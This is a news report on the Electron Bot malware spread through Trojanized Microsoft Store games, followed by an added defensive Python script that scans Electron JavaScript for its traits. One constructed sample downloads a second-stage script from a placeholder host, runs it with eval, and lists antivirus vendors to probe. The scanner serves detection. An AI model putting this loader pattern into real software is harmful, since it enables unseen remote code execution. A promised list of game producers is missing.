More than 5,000 Windows workstations in Sweden, Bulgaria, Russia, Bermuda, and Spain have been infected by a new malware strain capable of manipulating social media accounts. It was spread through Microsoft’s official app store in the form of Trojanized gaming programs. Israeli cybersecurity firm Check Point named the malware “Electron Bot” after a command-and-control (C2) domain used in recent attacks. The attackers’ identities are unknown, but the research suggests they may be based in Bulgaria.
In research released this week, Check Point’s Moshe Marelus noted: “Electron Bot is a modular SEO poisoning malware that is utilized for social media promotion and click fraud. It’s primarily distributed through the Microsoft Store platform, where it’s dumped from dozens of infected software, largely games, that the attackers are continually uploading.” The first hint of malicious behavior was detected in October 2018, when an ad clicker campaign was identified, with the malware hidden in plain sight in the form of a Google Photos app.
The malware is said to have gone through multiple revisions in the years since, gaining new features and evasion capabilities. The bot is built on the cross-platform Electron framework and is designed to load payloads fetched from the C2 server at run time, which makes it harder to identify. “This allows the attackers to change the bots’ behavior and modify the malware’s payload at any time,” Marelus stated.
Electron Bot’s primary purpose is to open a hidden browser window and use it for SEO poisoning, generating ad clicks, driving traffic to YouTube and SoundCloud content, and promoting specific products, in order to earn money from ad clicks or boost store ratings for sales revenue. It also has features for managing social media accounts on Facebook, Google, and SoundCloud, such as creating new accounts, signing in, and commenting on and liking other posts to boost views.
When a user downloads one of the compromised applications, such as Temple Endless Runner 2, from the Microsoft Store, the application launches as expected but also downloads and installs the next-stage dropper via JavaScript. Before the dropper fetches the actual bot malware, it runs checks for security software from vendors including Kaspersky Lab, ESET, Norton Security, Webroot, Sophos, and F-Secure.
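The three behaviours the article describes for the Electron-based dropper (fetching and executing code at run time, probing for installed security products, and driving a hidden browser window) are all visible in the app’s bundled JavaScript, which makes a static triage pass a cheap first check for defenders reviewing a suspicious store package. The following script is an added example, not Check Point’s tooling or anything from the malware itself; the two JavaScript samples it scans are constructed here, and the vendor list is the one named in the article.

```python
"""Heuristic triage of Electron app scripts for behaviours described above.

Added example (not Check Point's code). It flags three indicators:
  * remote-code-exec      network fetch plus a dynamic-execution sink
  * av-enumeration        several security-vendor names in one file
  * hidden-browser-window BrowserWindow created with show: false
"""
import re
from dataclasses import dataclass, field

# Dynamic-execution sinks (eval, new Function, Node's vm module).
DYNAMIC_EXEC = re.compile(
    r"\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.runIn\w+Context\s*\(")
# Network sources; co-occurrence with a sink is the signal, not either alone.
REMOTE_FETCH = re.compile(
    r"\bfetch\s*\(|\baxios\.\w+\s*\(|\bhttps?\.get\s*\(|\bnet\.request\s*\(")
# Security vendors the article says the dropper looks for (lower-cased).
SECURITY_VENDORS = ["kaspersky", "eset", "norton", "webroot", "sophos", "f-secure"]
# Electron window created hidden from the user.
HIDDEN_WINDOW = re.compile(
    r"new\s+BrowserWindow\s*\(\s*\{[^}]*\bshow\s*:\s*false", re.S)


@dataclass
class Finding:
    path: str
    indicators: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.indicators)


def scan_script(path: str, source: str) -> Finding:
    """Return a Finding listing which indicators the script source triggers."""
    finding = Finding(path)
    if REMOTE_FETCH.search(source) and DYNAMIC_EXEC.search(source):
        finding.indicators.append("remote-code-exec")
    low = source.lower()
    # Word boundaries keep "eset" from matching "reset".
    hits = [v for v in SECURITY_VENDORS if re.search(rf"\b{re.escape(v)}\b", low)]
    if len(hits) >= 3:
        finding.indicators.append("av-enumeration:" + ",".join(hits))
    if HIDDEN_WINDOW.search(source):
        finding.indicators.append("hidden-browser-window")
    return finding


def triage(samples: dict) -> list:
    """Scan every script and return only the flagged ones, worst first."""
    findings = (scan_script(p, s) for p, s in samples.items())
    return sorted((f for f in findings if f.indicators), key=lambda f: -f.score)


# Constructed samples; the hostname is a placeholder, not an indicator.
SAMPLES = {
    "benign/game.js": """
        const { BrowserWindow } = require('electron');
        const win = new BrowserWindow({ width: 1024, height: 768, show: true });
        fetch('https://example.invalid/leaderboard.json')
          .then(r => r.json()).then(render);
    """,
    "suspicious/loader.js": """
        const { BrowserWindow } = require('electron');
        const https = require('https');
        const names = ['Kaspersky', 'ESET', 'Norton', 'Webroot', 'Sophos', 'F-Secure'];
        https.get('https://example.invalid/stage2.js', res => {
          let body = '';
          res.on('data', d => body += d);
          res.on('end', () => eval(body));
        });
        const hidden = new BrowserWindow({ show: false, width: 800 });
    """,
}

if __name__ == "__main__":
    for f in triage(SAMPLES):
        print(f"{f.path}: score={f.score} {f.indicators}")
```

The co-occurrence rule matters: a game legitimately fetching a leaderboard over HTTPS is not a finding, but a script that fetches text and hands it to `eval` is the exact pattern the article describes, so it scores regardless of what the remote host is called. Scores are a triage aid for deciding which package to unpack and run in a sandbox next, not a verdict.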
The following is a list of game producers that distributed malware-infected apps:
“Because the bot’s payload is loaded dynamically at each run time,” Marelus explained, “assailants can tweak the code and shift the bot’s behavior to serious risk. They may, for example, start a second stage and release fresh malware, such as ransomware or a RAT. This can all take place without the victim’s knowledge.”